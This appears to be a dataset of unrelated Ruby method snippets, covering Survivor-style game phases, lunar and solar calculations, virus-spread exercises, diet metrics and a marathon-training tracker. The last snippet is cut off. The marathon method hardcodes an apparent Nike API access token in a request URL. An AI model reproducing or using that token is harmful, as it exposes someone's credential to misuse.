"def phase_one\n\t#Intro\n\n\t\t@borneo.tribes.each do |tribe|\n\t\tputs \"Welcome #{tribe}\".green\n\t\tend\n\nprint_header(\"For Phase 1, you will now compete in 8 challenges for immunity. Good luck!\")\n\n\t8.times do\n\t\timmunity_challenge_losing_tribe = @borneo.immunity_challenge\n\t\tputs \"#{immunity_challenge_losing_tribe}\".green + \" has lost the immunity challenge and must now vote out 1 member.\"\n\t\tmember_voted_off = immunity_challenge_losing_tribe.tribal_council\n\tend\t\nend",
"def omega() \r\n # delta_equinox()[ 3 ]\r\n Celes.faom03(@ta) \r\n end",
"def vac(hours = 1)\n vac = bac(hours) - eac(hours)\n vac.round(1)\n end",
"def phasehunt(date = nil)\n date = DateTime.now unless date\n sdate = date.ajd\n\n adate = sdate - 45\n ad1 = DateTime.jd(adate)\n\n k1 = ((ad1.year + ((ad1.month - 1) *\n (1.0 / 12.0)) - 1900) * 12.3685).floor\n\n adate = nt1 = meanphase(adate, k1)\n\n loop do\n adate += SYNMONTH\n k2 = k1 + 1\n nt2 = meanphase(adate, k2)\n break if nt1 <= sdate && nt2 > sdate\n nt1 = nt2\n k1 = k2\n end\n\n PhaseHunt.new(*[\n truephase(k1, 0.0),\n truephase(k1, 0.25),\n truephase(k1, 0.5),\n truephase(k1, 0.75),\n truephase(k2, 0.0)\n ].map do |_|\n _.new_offset(date.offset)\n end)\n end",
"def quarter_wind; end",
"def phase_one\n puts \"Phase 1 has been started\"\n\n 8.times do\n selected_tribe = @borneo.immunity_challenge\n\t\tputs \"#{selected_tribe} was the tribe selected to vote\".yellow\n\t\tvoted_off = selected_tribe.tribal_council\n\t\tputs \"#{voted_off} was voted OUT!\".red\n end\nend",
"def quarter_wind_azimuth; end",
"def tenure_mth\n self.tenure*12\n end",
"def mz_seasons\n age - System::JUNIOR_START_AGE\n end",
"def phase_one\n 8.times do\n @borneo.immunity_challenge.tribal_council()\n puts\n end\nend",
"def phase_one\n puts \"Get ready to start Part 1.\".light_grey\n puts \"Each Tribe will participate in an immunity challenge.\".light_grey\n puts \"The losing Tribe will then vote someone off the island.\".light_grey\n 8.times do \n\t#Sets variable for tribe loser of immunity challege\n\tlosing_tribe = @borneo.immunity_challenge \n\tputs \"#{losing_tribe} \".red + \"has lost the challenge and will vote someone off the island.\"\n\t#Losing tribe holds tribal council and votes off member\n\tmember_voted_off = losing_tribe.tribal_council\n\tputs \"Sadly, \" + \"#{member_voted_off} \".green + \"has been voted off the island.\"\n end\nend",
"def velocity\n @moons.each do |moon|\n moon[:position][:x] += moon[:velocity][:x]\n moon[:position][:y] += moon[:velocity][:y]\n moon[:position][:z] += moon[:velocity][:z]\n end\n end",
"def mo_Earth() \r\n# [ -0.0000000434, -0.000000576, 0.00200340, \r\n# -0.0001831, -46.836769, 84381.406 ].inject(0.0) {|p, a| p * @ta + a} * DAS2R\r\n Celes.obl06(@ajd, 0)\r\n end",
"def current_pomodoro\n total - pomodoros + 1\n end",
"def roman_numeral year\n thou = year/1000\n thou_remain = year%1000\n five_hundreds = thou_remain/500\n hundreds = (thou_remain%500)/100\n fifties = ((thou_remain%500)%100)/50\n tens = (((thou_remain%500)%100)%50)/10\n fives = ((((thou_remain%500)%100)%50)%10)/5\n ones = (((((thou_remain%500)%100)%50)%10)%5)/1\n \n \n #this is just to clear the terminal screen so you only see the result.\n100.times do puts \"\" \n end\n \n #outputs the letters times the number returned.\n puts \"M\" * thou + \"D\" * five_hundreds + \"C\" * hundreds + \"L\" * fifties + \"X\" * tens + \"V\" * fives + \"I\" * ones\nend",
"def zodiacValue(sign)\n return (sign)%12\nend",
"def phase_one\n introduction\n title \"Phase One\"\n losers = 0\n immune_members = []\n 8.times do\n losing_tribe = @borneo.tribes.shuffle.first\n puts \"The losing tribe is #{losing_tribe}\".red\n loser = losing_tribe.tribal_council()#no immune members\n puts \" The loser member is #{loser}\"\n losers += 1\n counting = 0\n @borneo.tribes.each{|tribe| counting += tribe.members.length}\n puts \" #{losers} gone!\"\n puts \" #{counting} remaining players\"\n end\nend",
"def part2(moons = INPUT, turns = 3000)\n seen = {}\n\n (0...turns).each do |turn|\n (0...4).each do |i|\n ((i + 1)...4).each do |j|\n moons[i].velocity_change += (moons[i].position.gravity(moons[j].position))\n moons[j].velocity_change += (moons[j].position.gravity(moons[i].position))\n end\n end\n\n moons.each do |moon|\n moon.adjust_state\n #print_state(moons, turn)\n end\n\n hash = moons.map(&:to_a).reduce(&:+).hash\n if seen.has_key?(hash)\n puts \"seen in #{turn} turns\"\n return\n end\n seen[hash] = 1\n #print_state(moons, turn)\n if turn % 1000 == 0\n puts \"#{turn}\"\n end\n end\n\n\n end",
"def phase_two\n puts \"Phase 2 has been started\"\n\n 3.times do\n immune = @borneo.individual_immunity_challenge\n puts \"#{immune} win the immunity\".blue\n voted_off_contestant = @merge_tribe.tribal_council({immune: immune})\n puts \"#{voted_off_contestant} is OUT!\".red\n end\nend",
"def speed_of_spread #in months\n # We are still perfecting our formula here. The speed is also affected\n # by additional factors we haven't added into this functionality.\n speed = 0.0\n\n if @population_density >= 200\n speed += 0.5\n elsif @population_density >= 150\n speed += 1\n elsif @population_density >= 100\n speed += 1.5\n elsif @population_density >= 50\n speed += 2\n else\n speed += 2.5\n end\n\n#we can remove this and have it print within virus_effects so that this method does one thing\n puts \" and will spread across the state in #{speed} months.\\n\\n\"\n\n end",
"def calculate_apr\n payment_ratio = pmt / principal_calculation\n duration = @duration\n f = lambda {|k| (k**(duration + 1) - (k**duration * (payment_ratio + 1)) + payment_ratio)}\n f_deriv = lambda { |k| ((duration + 1) * k**duration) - (duration * (payment_ratio + 1) * k**(duration - 1))}\n\n root = newton_raphson(f, f_deriv, monthly_rate + 1)\n 100 * 12 * (root -1).to_f\n end",
"def find_direction(r_o, c_o, r_q, c_q)\n (Complex(c_o - c_q, r_o - r_q).phase / Math::PI * 4).round\nend",
"def full_moon?\n pom == FULL_MOON\n end",
"def phase_one\n puts \"Phase 1 Starting\".yellow\n counter = 8\n eliminated = []\n while counter > 0\n indexer = 8 - counter\n puts \"Phase one, round #{(indexer+1).to_s}:\".green\n tribe_selected = @borneo.immunity_challenge\n puts \"Tribe selected: #{tribe_selected.to_s}\".green\n puts \"Contestant #{tribe_selected.tribal_council} was eliminated without mercy!\".red\n counter -= 1\n end\n 8 # this is here to pass the test, but not sure it's ver useful beyond that\nend",
"def ma_Sun()\r\n @ta = ( @ajd - DJ00 ) / DJC \r\n# @ma = delta_equinox()[2]\r\n @ma = Celes.falp03(@ta) \r\n end",
"def betting_phases\n @betting_phases ||= [:pre_flop, :flop, :turn, :river]\n end",
"def calc\n calc_spawn_zombie\n calc_move_zombies\n calc_player\n calc_kill_zombie\n end",
"def dec_Sun() \r\n asin( sin(Celes.nut06a(@ajd, 0)[ 1 ] + Celes.obl06(@ajd, 0)) * \r\n sin( al(@ma, @ta, Celes.faom03(@ta)))) \r\n end",
"def calculo \n self.minutos_reales = 5 * 480 #cantidad de OPERARIOS * Jornada de Trabajo(Turnos)\n self.costo_minuto = 89 #Costo Real por minuto\n self.otros_costos = 540 * 89 #Tiempo Total(Minutos) * Costo Real por Minutos\n self.costo_mano_obra = 420 * 5 * 89 # Jornada Minutos * Cantidad Operarios * Costo Real por minutos \n self.manoObraPlaneada = 650.000 * 5 # Salario Total * Cantidad de operarios \n end",
"def chocolate_goal\n chocolate_per_day = 2\n days_in_life = 80 * 365\n\n chocolate_per_day * days_in_life\n end",
"def mill_motor_housing\r\n # # # # # # # # #\r\n end",
"def marathon\n\n\t\tdef km_to_mi (km)\n\t\t\tmiles = km * 0.621371\n\t\tend\n\n\t\tdef percent_complete_training (total_miles, goal_miles)\n\t\t\t@percent_complete = total_miles / 667\n\t\tend\n\n\t\t#@greeting = greetings.shuffle[0]\n\t\t#@firstname = params[:firstname]\n\t\t#@phonenumber = params[:phonenumber]\n\n\t\t#start_date_string = params[:start_date]\n\t\tstart_date_string = \"2015-05-04\"\n\t\t#puts \"START DATE STRING: #{start_date_string}\"\n\t\t@start_date = Date.parse(\"#{start_date_string}\")\n\n\t\t@todays_date = Date.today\n\n\n\t\tdef plan_position_calculator todays_date, plan_start_date\n\t\t\tdays_elapsed = todays_date - plan_start_date #calculate span in days\n\t\t\t@overall_position = days_elapsed.to_i + 1 #difference in days\n\t\t\t@week_position = (days_elapsed.to_i / 7) + 1\n\t\t\t@day_position = ((days_elapsed.to_i) % 7)\n\n\t\t\tputs \"THIS IS THE position on the chart: #{@overall_position}\"\n\t\t\tputs \"THIS IS THE week: #{@week_position}\"\n\t\t\tputs \"THIS IS THE day: #{@day_position}\"\n\n\t\t\t@todays_run = BEGINNER[@week_position][@day_position]\n\t\tend\n\n\t\tplan_position_calculator @todays_date, @start_date\n\n\n\t\t@time_now = Time.now\n\t\t@race_date = Time.new(2015,10,11)\n\n\t\tdef time_until_race todays_date, race_date\n\t\t\tdays_until_race = race_date - todays_date\n\t\t\t@days_until_longint = days_until_race / (60*60*24)\n\t\t\t@total_days_until_race = (@days_until_longint.to_f).ceil\n\t\t\t@weeks_until_race = @total_days_until_race / 7\n\t\t\t@remainder_days_until_race = @total_days_until_race % 7\n\t\tend\n\n\t\ttime_until_race(@time_now, @race_date)\n\n\t\t# Build URL for GET request\n\n\t\t# current_date = Time.now.utc.iso8601[0..9]\n\t\tcurrent_date = @todays_date.to_s\n\t\t# current_date_string = current_date.to_s\n\t\tresults = \"200\"\n\t\tbase = \"https://api.nike.com/me/sport/activities?\"\n\t\taccess_token = \"access_token=lJTUBeEeSeeLBncuWWYWKT03BRG2\"\n\t\tstart_date_param = \"&startDate=#{@start_date}\"\n\t\tend_date_param = \"endDate=#{current_date}\"\n\t\tcount = \"&count=#{results}\"\n\n\t\turl = \"#{base}#{end_date_param}#{start_date_param}&#{access_token}#{count}\"\n\t\tputs url\n\t\tdata = Nokogiri::HTML(open(url))\n\n\t\tparsed = JSON.parse(data)\n\n\t\thash = parsed[\"data\"]\n\n\t\t## Write file with current data\n\n\t\t# newFile = File.write('./dummydata.txt', hash)\n\t\t# puts \"FILE SAVED AS dummydata.txt\"\n\n\t\t@number_of_runs = 0\n\t\t@total_kilos = 0\n\t\t@total_time = 0\n\t\t@average_pace = 0\n\t\t@total_duration = 0\n\n\t\n\t\t#chronic duration\n\t\tdef cd time\n\t\t\tChronicDuration.parse(time)\t\t\t\n\t\tend\n\n\t\t# Loop through hash to get all distances\n\n\t\thash.each do |activity|\n\t\t\tif activity[\"activityType\"] == \"RUN\"\n\t\t\t\t@number_of_runs += 1\n\t\t\t\t@total_kilos += activity[\"metricSummary\"][\"distance\"]\n\t\t\t\t@total_duration += cd(activity[\"metricSummary\"][\"duration\"])\n\t\t\tend\n\t\t\t# @total_time += activity[\"metricSummary\"][\"duration\"]\n\t\t\t# puts \"#{activity[\"metricSummary\"][\"distance\"]} + DATE: #{activity[\"startTime\"]}\"\n\t\t\t# puts \"#{activity[\"metricSummary\"][\"duration\"]}\"\n\t\tend\n\n\t\t#time spent running\n\n\t\t@total_duration = @total_duration.floor\n\t\t@total_hours = (@total_duration / 3600).floor\n\t\t@total_minutes = ((@total_duration % 3600) / 60).floor\n\t\t@total_seconds = @total_duration % 60\n\n\t\t@total_miles = km_to_mi(@total_kilos)\n\n\t\t# Average pace \n\t\t@average_pace = @total_duration / @total_miles\n\t\t@average_pace_minutes = (@average_pace / 60).floor\n\t\t@average_pace_seconds = (@average_pace % 60).floor\n\n\t\tputs \"TOTAL DURATION: #{@total_duration}\"\n\t\t#predicted marathon time\n\t\t@marathon_time = @average_pace * 26.2\n\t\t@marathon_pace_seconds = (@marathon_time % 60).floor\n\t\t@marathon_pace_minutes = ((@marathon_time / 60) % 60).ceil\n\t\t@marathon_pace_hours = (@marathon_time / 3600).floor\n\t\t\n\n\t\t# LAST RUN\n\t\t# Reasoning: usually the last activity will be a run. If not, the second to last one will be.\n\n\n\t\tif hash[0][\"activityType\"] == \"RUN\"\n\t\t\t@last_run_distance_km = hash[0][\"metricSummary\"][\"distance\"]\n\t\t\t@last_run_time = hash[0][\"metricSummary\"][\"duration\"]\n\t\t\t@last_run_start_time = hash[0][\"startTime\"][0...-10]\n\t\telse\n\t\t\t@last_run_distance_km = hash[1][\"metricSummary\"][\"distance\"]\n\t\t\t@last_run_time = hash[1][\"metricSummary\"][\"duration\"]\n\t\t\t@last_run_start_time = hash[0][\"startTime\"][0...-10]\n\t\tend\n\n\t\t@last_run_distance = km_to_mi @last_run_distance_km\n\n\t\tputs @last_run_time\n\t\t@last_run_time = cd @last_run_time\n\n\t\t@last_run_pace_seconds = @last_run_time / @last_run_distance\n\t\tpace_seconds = @last_run_pace_seconds % 60\n\t\tpace_minutes = (@last_run_pace_seconds / 60) % 60\n\n\t\t@last_run_pace_formatted = format(\"%02d:%02d\", pace_minutes, pace_seconds)\n\n\t\tseconds = @last_run_time % 60\n\t\tminutes = (@last_run_time / 60) % 60\n\t\thours = @last_run_time / (60 * 60)\n\n\t\t@last_run_time_formatted = format(\"%02d:%02d:%02d\", hours, minutes, seconds) #=> \"01:00:00\"\n\n\t\t#puts \"LAST RUN? #{@last_run_distance_km}, duration: #{@last_run_time}\"\n\n\t\t#LAST 7 Days of Runs\n\n\t\tgon.pace = []\n\t\tgon.runs = []\n\t\tgon.days = []\n\n\t\thash.each do |activity|\n\t\t\tif activity[\"activityType\"] == \"RUN\"\n\t\t\t\tdistance = ((activity[\"metricSummary\"][\"distance\"])*0.621371192).round(2)\n\t\t\t\tgon.runs.push(distance)\n\t\t\t\tduration = (cd(activity[\"metricSummary\"][\"duration\"]).round(2) / distance) / 60\n\t\t\t\tgon.pace.push(duration.round(2))\n\t\t\t\tdate = activity[\"startTime\"][0...-10]\n\t\t\t\tgon.days.push(date)\n\t\t\telse\n\t\t\t\tnext\n\t\t\tend\n\t\tend\n\t\t\n\t\tgon.runs = gon.runs.reverse\n\t\tgon.days = gon.days.reverse\n\t\tgon.pace = gon.pace.reverse\n\n\t\t#convert from kilometers to miles\n\n\t\t\n\n\t\tpercent_complete_training(@total_miles, BEGINNER)\n\n\t\t# Public Shaming section\n\t\t@last_run_parsed = Date.parse(@last_run_start_time)\n\n\t\tputs \"LAST RUN START TIME ======================>>>>> #{@last_run_parsed}\"\n\n\n\t\t# Do I need to run today?\n\n\t\tif @todays_run > 0\n\t\t\trunning_required = true\n\t\t\tputs \"today is a running day\"\n\t\t\tif @last_run_parsed == Date.today\n\t\t\t\tputs \"You ran today, good job\"\n\t\t\t\t@ran_yet = true\n\t\t\t\t@miles_ran_today = @last_run_distance.round(2)\n\t\t\telse\n\t\t\t\tputs \"Paul hasn't ran yet\"\n\t\t\t\t@ran_yet = false\n\t\t\t\t@miles_ran_today = 0\n\t\t\tend\n\t\telse\n\t\t\trunning_required = false\n\t\t\tputs \"today is not a running day\"\n\t\tend\n\n\tif @miles_ran_today == 0\n\t\t@miles_ran_today = \"0\"\n\tend\n\n\t\tputs \"miles ran today: #{@miles_ran_today}\"\n\tend",
"def huella_nutricional\n numero1 = self.calculo_valor_calorico_total\n numero2 = self.calculo_emisiones_diarias\n\n if numero1 < 670\n ienergia = 1\n elsif numero1 <=830\n ienergia = 2\n else\n ienergia = 3\n end\n\n if numero2 < 800\n icarbono = 1\n elsif numero2 <= 1200\n icarbono = 2\n else\n icarbono = 3\n end\n\n media = (ienergia + icarbono)/2\n end",
"def planet_info #(there's no parameter here)\n puts \"#{@name} has #{@orbital} days in one of its years, weighs #{@mass} earth, has #{@moons}, and is #{@distance_from_sun} million miles from the sun.\"\n end",
"def motor\n\t\tbase = outline.linear_extrude(height:(@motor_height/6)*4,center:true).color(\"DimGray\")\n\n\t\tbase+= outline.linear_extrude(height:(@motor_height/6),center:true).translate(z:(@motor_height/1.5+@motor_height/6-0.1)/2).color(\"LightGrey\") \t\t\n\t\tbase+= outline.linear_extrude(height:(@motor_height/6),center:true).translate(z:-(@motor_height/1.5+@motor_height/6-0.1)/2).color(\"LightGrey\") \t\t\n\t\t\n\t\tflange=cylinder(d:@motor_flange_dia,h:@motor_flange_height,center:true).translate(z:(@motor_height+@motor_flange_height-0.01)/2).color(\"LightGrey\")\n\t\t\t\t\n\t\tshaft = cylinder(d:@motor_shaft_OD,h:@motor_shaft_height,center:true).translate(z:(@motor_shaft_height+@motor_height+@motor_flange_height)/2).color(\"WhiteSmoke\")\n\n\t\t# screw holes\n\t\t[-1,1].each do |i|\t\n\t\t\t[-1,1].each do |f|\t\n\t\t\t\tbase-= cylinder(d:@motor_mounting_hole_diam,h:@motor_height+1,center:true).translate(x:i*@motor_mounting_hole_distance/2,y:f*@motor_mounting_hole_distance/2,z:@motor_height-8).color(\"DimGray\")\n\t\t\tend\n\t\tend\n\n\n\t\tmotor = base+flange+shaft\n\t\t# move motor that z is 0\n\t\tmotor.translate(z:@motor_height/2)\t\t\n\tend",
"def phase_type_description\n case phase_type\n when 0 then\n '3 Phase With Neutral, Display L-N'\n when 1 then\n '3 Phase With Neutral, Display L-L'\n when 2 then\n 'Single Split Phase A+B with Neutral, Display L-N'\n when 3 then \n 'Single Phase A to Neutral, Display L-N'\n else\n 'Unknown phase type!'\n end\n end",
"def fortnights ; Duration[self * 1209600] ; end",
"def phase_one\n\tputs \"Phase One: Pre-Merge\".yellow\n\t8.times do\n\t\tlost_tribe = @borneo.immunity_challenge\n\t\tputs \"Tribe #{lost_tribe.to_s.red} has lost this round. They are voting off a member.\"\n\t\teliminated_contestant = lost_tribe.tribal_council\n\t\tputs \"#{eliminated_contestant.to_s.capitalize.red} was voted off.\"\n\tend\n\t#puts \"Phase one ends. 8 contestants were voted off in this phase, and 12 contestants remain in the game.\"\nend",
"def mood \n if self.happiness && self.nausea\n mood = self.happiness - self.nausea\n mood > 0 ? \"happy\" : \"sad\"\n end\n end",
"def mood\n if self.happiness && self.nausea\n mood = self.happiness - self.nausea\n mood > 0 ? \"happy\" : \"sad\"\n end\nend",
"def phase_one\n\tputs divider\n\tputs \"Phase One\"\n\tputs divider\n\t8.times do \n\t\ttribe_immunity_challenge\n\tend\nend",
"def angle_equation_of_time() \r\n delta_orbit() + delta_oblique()\r\n end",
"def create_duration_table(quarter_note_length)\n # Fuck it if the song have two dots or a combination of dots and \"three\"...\n whole = (quarter_note_length * 4)\n dotted_whole = (quarter_note_length * 6)\n whole_triplet = (8 * quarter_note_length / 3)\n half = (quarter_note_length * 2)\n dotted_half = (quarter_note_length * 3)\n half_three = (whole / 3)\n dotted_quarter = (quarter_note_length * 1.5)\n quarter_triplet = (half / 3)\n eight = (quarter_note_length / 2)\n eight_triplet = (quarter_note_length / 3)\n dotted_eight = (3 * quarter_note_length / 4)\n sixteenth = (quarter_note_length / 4)\n sixteenth_triplet = (eight / 3)\n dotted_sixteenth = (3 * quarter_note_length / 8)\n thirty_second = (quarter_note_length / 8)\n thirty_second_triplet = (sixteenth / 3)\n dotted_thirty_second = (3 * quarter_note_length / 16)\n sixty_fourth = (quarter_note_length / 16)\n sixty_fourth_triplet = (thirty_second / 3)\n dotted_sixty_fourth = (3 * quarter_note_length / 32)\n \n @duration_table = {\n whole => 'whole',\n dotted_whole => 'dotted whole',\n whole_triplet => 'whole triplet',\n half => 'half',\n dotted_half => 'dotted half',\n half_three => 'half triplet',\n quarter_note_length => 'quarter',\n dotted_quarter => 'dotted quarter',\n quarter_triplet => 'quarter triplet',\n eight => 'eighth',\n dotted_eight => 'dotted eighth',\n eight_triplet => 'eighth triplet',\n sixteenth => 'sixteenth',\n dotted_sixteenth => 'dotted sixteenth',\n sixteenth_triplet => 'sixteenth triplet',\n thirty_second => 'thirtysecond',\n dotted_thirty_second => 'dotted thirtysecond',\n thirty_second_triplet => 'thirtysecond triplet',\n sixty_fourth => 'sixtyfourth',\n dotted_sixty_fourth => 'dotted sixtyfourth',\n sixty_fourth_triplet => 'sixtyfourth triplet'\n }\n end",
"def speed_of_spread #in months\n # We are still perfecting our formula here. The speed is also affected\n # by additional factors we haven't added into this functionality.\n speed\n puts \" and will spread across the state in #{speed} months.\\n\\n\"\n end",
"def speed_of_spread#in months\n # We are still perfecting our formula here. The speed is also affected\n # by additional factors we haven't added into this functionality.\n speed = 0.0\n\n if @population_density >= 200\n speed += 0.5\n elsif @population_density >= 150\n speed += 1\n elsif @population_density >= 100\n speed += 1.5\n elsif @population_density >= 50\n speed += 2\n else\n speed += 2.5\n end\n\n puts \" and will spread across the state in #{speed} months.\\n\\n\"\n\n end",
"def phase; end",
"def jpd_noon\r\n $jpd_2000 + jpd_cycle - local_angle\r\nend",
"def attack_phase\n \n #encontra o territorio com mais exercitos\n territorios = get_territories.clone\n territorios.sort! { |a,b| b.troops <=> a.troops }\n \n if territorios[0].troops == 1\n @controller.attack_end(@conn,nil)\n return\n else\n origem = territorios[0]\n\n #encontra territorio inimigo com menos tropas\n alvos = vizinhos_inimigos(origem)\n \n if alvos.size == 0 \n @controller.attack_end(@conn,nil)\n return\n end\n alvos.sort! { |a,b| a.troops <=> b.troops } \n \n alvo = alvos[0]\n \n \n order = {'origin' => origem.id, 'destiny' => alvo.id, 'qtd' => origem.troops-1}\n @controller.attack_order(@conn,order)\n end\n \n \n \n #usar @controller.attack_order() para fazer um ataque\n #usar @controller.attack_end() para terminar fase de ataque\n end",
"def huella_nutricional\n (valor_calorico() + huella_carbono()) / 2\n end",
"def gravity\n @moons.combination(2).to_a.each do |moon_a, moon_b|\n if moon_a[:position][:x] < moon_b[:position][:x]\n moon_a[:velocity][:x] += 1\n moon_b[:velocity][:x] -= 1\n elsif moon_b[:position][:x] < moon_a[:position][:x]\n moon_a[:velocity][:x] -= 1\n moon_b[:velocity][:x] += 1\n end\n\n if moon_a[:position][:y] < moon_b[:position][:y]\n moon_a[:velocity][:y] += 1\n moon_b[:velocity][:y] -= 1\n elsif moon_b[:position][:y] < moon_a[:position][:y]\n moon_a[:velocity][:y] -= 1\n moon_b[:velocity][:y] += 1\n end\n\n if moon_a[:position][:z] < moon_b[:position][:z]\n moon_a[:velocity][:z] += 1\n moon_b[:velocity][:z] -= 1\n elsif moon_b[:position][:z] < moon_a[:position][:z]\n moon_a[:velocity][:z] -= 1\n moon_b[:velocity][:z] += 1\n end\n end\n end",
"def speed_of_spread #in months\r\n # We are still perfecting our formula here. The speed is also affected\r\n # by additional factors we haven't added into this functionality.\r\n speed = 0.0\r\n\r\n if @population_density >= 200\r\n speed += 0.5\r\n elsif @population_density >= 150\r\n speed += 1\r\n elsif @population_density >= 100\r\n speed += 1.5\r\n elsif @population_density >= 50\r\n speed += 2\r\n else\r\n speed += 2.5\r\n end\r\n puts \"#{@state} will lose #{@number_of_deaths} people in this outbreak and will spread across the state in #{speed} months.\\n\\n\"\r\n end",
"def speed_of_spread#in months\n # We are still perfecting our formula here. The speed is also affected\n # by additional factors we haven't added into this functionality.\n speed = 0.0\n\n if @population_density >= 200\n speed += 0.5\n elsif @population_density >= 150\n speed += 1\n elsif @population_density >= 100\n speed += 1.5\n elsif @population_density >= 50\n speed += 2\n else\n speed += 2.5\n end\n\n puts \" and will spread across the state in #{speed} months.\\n\\n\"\n\n end",
"def secret_formula(started)\n jelly_beans = started * 500\n jars = jelly_beans / 1000\n crates = jars / 100\n return jelly_beans, jars , crates\nend",
"def speed_of_spread #in months\n # We are still perfecting our formula here. The speed is also affected\n # by additional factors we haven't added into this functionality.\n speed = 0.0\n\n if population_density >= 200\n speed += 0.5\n elsif population_density >= 150\n speed += 1\n elsif population_density >= 100\n speed += 1.5\n elsif population_density >= 50\n speed += 2\n else\n speed += 2.5\n end\n\n puts \" and will spread across the state in #{speed} months.\\n\\n\"\n\n end",
"def secret_formula(started)\n jelly_beans = started * 500\n jars = jelly_beans / 1000\n crates = jars / 100\n return jelly_beans, jars, crates\nend",
"def secret_formula(started)\n jelly_beans = started * 500\n jars = jelly_beans / 1000\n crates = jars / 100\n return jelly_beans, jars, crates\nend",
"def secret_formula(started)\n jelly_beans = started * 500\n jars = jelly_beans / 1000\n crates = jars / 100\n return jelly_beans, jars, crates\nend",
"def secret_formula(started)\n jelly_beans = started * 500\n jars = jelly_beans / 1000\n crates = jars / 100\n return jelly_beans, jars, crates\nend",
"def spavanac\n input = gets.to_s.split(\" \")\n hours = input[0].to_i\n minutes = input[1].to_i\n remainder = 45 - minutes\n minutes -= 45\n hours_remainder = hours - 1\n if minutes.negative?\n minutes = 60 - remainder\n hours = hours_remainder\n if hours.negative?\n hours = 24 - 1\n end\n end\n puts \"#{hours} #{minutes}\"\nend",
"def phase_sequence\n hash = {\n :idle => method(:idle_key),\n :victory => method(:victory_key),\n :hurt => method(:hurt_key),\n :skill => method(:skill_key),\n :evade => method(:evade_key),\n :return => method(:return_key),\n :escape => method(:escape_key),\n :prepare => method(:prepare_key),\n :intro => method(:intro_key),\n :counter => method(:counter_key),\n :collapse => method(:collapse_key),\n :forced => method(:forced_act),\n :covered => method(:covered_key),\n }\n return hash\n end",
"def huella_ambiental\r\n energia = 0.0\r\n carbono = 0.0\r\n huella = 0.0\r\n if vct < 670 then\r\n energia = 1.0\r\n elsif vct <= 830 then\r\n energia = 2.0\r\n else\r\n energia = 3.0\r\n end\r\n if gei < 800 then\r\n carbono = 1.0\r\n elsif terrenos <= 1200 then\r\n carbono = 2.0\r\n else\r\n carbono = 3.0\r\n end\r\n huella = (energia + carbono)/2\r\n return huella\r\n \r\n end",
"def secret_formula(started)\n# Assigns variables, each building on the other.\n jelly_beans = started * 500\n jars = jelly_beans / 1000\n crates = jars / 100\n# Returns a value that is associated with each variable\n return jelly_beans, jars, crates\nend",
"def sine_to_Earth()\r\n sin(Celes.nut06a(@ajd, 0)[ 1 ] + Celes.obl06(@ajd, 0))\r\n end",
"def speed_of_spread #in months\n # We are still perfecting our formula here. The speed is also affected\n # by additional factors we haven't added into this functionality.\n speed = 0.0\n\n if @population_density >= 200\n speed += 0.5\n elsif @population_density >= 150\n speed += 1\n elsif @population_density >= 100\n speed += 1.5\n elsif @population_density >= 50\n speed += 2\n else\n speed += 2.5\n end\n\n \" and will spread across the state in #{speed} months.\\n\\n\"\n\n end",
"def speed_of_spread #in months\r\n # We are still perfecting our formula here. The speed is also affected\r\n # by additional factors we haven't added into this functionality.\r\n speed = 0.0\r\n\r\n # if @population_density >= 200\r\n # speed += 0.5\r\n # elsif @population_density >= 150\r\n # speed += 1\r\n # elsif @population_density >= 100\r\n # speed += 1.5\r\n # elsif @population_density >= 50\r\n # speed += 2\r\n # else\r\n # speed += 2.5\r\n # end\r\n\r\n puts \" and will spread across the state in #{@speed} months.\\n\\n\"\r\n\r\n end",
"def get_monoin\n @_100=((@monoin*100)/@peso)\n @ir_100=(@_100/25)*100\n @porcion=((@monoin*@gramos_porciones)/@peso)\n @ir_porcion=(@porcion/25)*100\n [ @monoin , @_100 , @ir_100.round(1) , @porcion , @ir_porcion.round(1) ]\n end",
"def speed_of_spread #in months\n # We are still perfecting our formula here. The speed is also affected\n # by additional factors we haven't added into this functionality.\n speed = 0.0 #this can be made into a class attribute allowing a getter\n\n if @population_density >= 200\n speed += 0.5\n elsif @population_density >= 150\n speed += 1\n elsif @population_density >= 100\n speed += 1.5\n elsif @population_density >= 50\n speed += 2\n else\n speed += 2.5\n end\n #Print method can be removed allowing information to be printed in the driver code\n puts \" and will spread across the state in #{speed} months.\\n\\n\"\n\n end",
"def secret_formula(started)\r\n\tjelly_beans = started * 500\r\n\tjars = jelly_beans / 1000\r\n\tcrates = jars / 100\r\n\treturn jelly_beans, jars, crates\r\nend",
"def phi\n m = modulus\n (m == 0)? 0 : Math.acos(z/m)\n end",
"def speed_of_spread #in months\n # We are still perfecting our formula here. The speed is also affected\n # by additional factors we haven't added into this functionality.\n speed = 0.0\n\n # if @population_density >= 200\n # speed += 0.5\n # elsif @population_density >= 150\n # speed += 1\n # elsif @population_density >= 100\n # speed += 1.5\n # elsif @population_density >= 50\n # speed += 2\n # else\n # speed += 2.5\n # end\n\n speed += case @population_density\n when 0...50\n 2.5\n when 50...100\n 2\n when 100...150\n 1.5\n when 150...200\n 1\n else\n 0.5\n end\n \n puts \" and will spread across the state in #{speed} months.\\n\\n\"\n\n end",
"def moonIntensity \n \"moonIntensity\" \n end",
"def save_hours\n @day = Schedule.find(params[:monthday])\n\n @pitch.schedule.h0 = hours[0]\n @pitch.schedule.h1 = hours[1]\n @pitch.schedule.h2 = hours[2]\n @pitch.schedule.h3 = hours[3]\n @pitch.schedule.h4 = hours[4]\n @pitch.schedule.h5 = hours[5]\n @pitch.schedule.h6 = hours[6]\n @pitch.schedule.h7 = hours[7]\n @pitch.schedule.h8 = hours[8]\n @pitch.schedule.h9 = hours[9]\n @pitch.schedule.h10 = hours[10]\n @pitch.schedule.h11 = hours[11]\n @pitch.schedule.h12 = hours[12]\n @pitch.schedule.h13 = hours[13]\n @pitch.schedule.h14 = hours[14]\n @pitch.schedule.h15 = hours[15]\n @pitch.schedule.h16 = hours[16]\n @pitch.schedule.h17 = hours[17]\n @pitch.schedule.h18 = hours[18]\n @pitch.schedule.h19 = hours[19]\n @pitch.schedule.h20 = hours[20]\n @pitch.schedule.h21 = hours[21]\n @pitch.schedule.h22 = hours[22]\n @pitch.schedule.h23 = hours[23]\n @pitch.schedule.h24 = hours[24]\n @pitch.schedule.h25 = hours[25]\n @pitch.schedule.h26 = hours[26]\n @pitch.schedule.h27 = hours[27]\n @pitch.schedule.h28 = hours[28]\n @pitch.schedule.h29 = hours[29]\n @pitch.schedule.h30 = hours[30]\n @pitch.schedule.h31 = hours[31]\n @pitch.schedule.h32 = hours[32]\n @pitch.schedule.h33 = hours[33]\n @pitch.schedule.h34 = hours[34]\n @pitch.schedule.h35 = hours[35]\n @pitch.schedule.h36 = hours[36]\n @pitch.schedule.h37 = hours[37]\n 